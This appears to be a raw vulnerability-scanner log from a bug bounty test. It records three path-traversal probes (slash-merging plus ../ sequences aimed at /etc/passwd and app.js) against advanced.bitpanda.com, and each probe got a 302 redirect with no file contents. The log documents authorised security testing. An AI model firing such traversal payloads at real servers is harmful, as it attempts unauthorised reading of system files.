[nginx-merge-slashes-path-traversal] Dumped HTTP request for https://advanced.bitpanda.com///////../../../etc/passwd


GET ///////../../../etc/passwd HTTP/1.1
Host: advanced.bitpanda.com
User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/113.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
Accept-Encoding: gzip


[nginx-merge-slashes-path-traversal] Dumped HTTP response https://advanced.bitpanda.com///////../../../etc/passwd

HTTP/1.1 302 Found
Connection: close
Alt-Svc: clear
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Tue, 05 Aug 2025 12:50:39 GMT
Location: https://advanced.bitpanda.com/etc/passwd
Content-Length: 0


[nginx-merge-slashes-path-traversal] Dumped HTTP request for https://advanced.bitpanda.com/static///////../../../../etc/passwd


GET /static///////../../../../etc/passwd HTTP/1.1
Host: advanced.bitpanda.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
Accept-Encoding: gzip


[nginx-merge-slashes-path-traversal] Dumped HTTP response https://advanced.bitpanda.com/static///////../../../../etc/passwd

HTTP/1.1 302 Found
Connection: close
Alt-Svc: clear
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Tue, 05 Aug 2025 12:50:39 GMT
Location: https://advanced.bitpanda.com/static///etc/passwd
Content-Length: 0


[nginx-merge-slashes-path-traversal] Dumped HTTP request for https://advanced.bitpanda.com///../app.js


GET ///../app.js HTTP/1.1
Host: advanced.bitpanda.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
Connection: close
Accept: */*
Accept-Language: en
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
Accept-Encoding: gzip


[nginx-merge-slashes-path-traversal] Dumped HTTP response https://advanced.bitpanda.com///../app.js

HTTP/1.1 302 Found
Connection: close
Alt-Svc: clear
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Tue, 05 Aug 2025 12:50:39 GMT
Location: https://advanced.bitpanda.com/app.js
Content-Length: 0


